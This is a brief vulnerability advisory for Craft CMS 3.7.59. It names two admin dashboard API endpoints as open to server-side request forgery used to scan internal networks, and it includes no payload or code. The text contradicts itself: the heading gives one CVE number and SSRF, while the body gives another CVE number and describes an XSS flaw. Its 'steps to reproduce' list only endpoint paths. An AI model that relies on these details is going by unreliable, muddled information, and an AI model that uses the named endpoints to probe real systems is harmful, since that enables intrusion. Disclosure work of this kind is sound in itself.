[CVE-2023-33616] Server-side request forgery (SSRF)
Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services
Vendor of Product: CraftCMS
Affected Product Code Base: 3.7.59
CVE: CVE-2023-33614
Description: Craft CMS version 3.7.59 is vulnerable of XSS vulnerability, which allows remote unauthenticated attacker to execute javascript code via error and message parameter.
Steps to reproduce:
Api
admin/actions/dashboard/get-feed-items
, andadmin/actions/dashboard/save-widget-settings
are vulnerable of SSRF, which allows user can scan network, finding internal port and internal web applications.
Last updated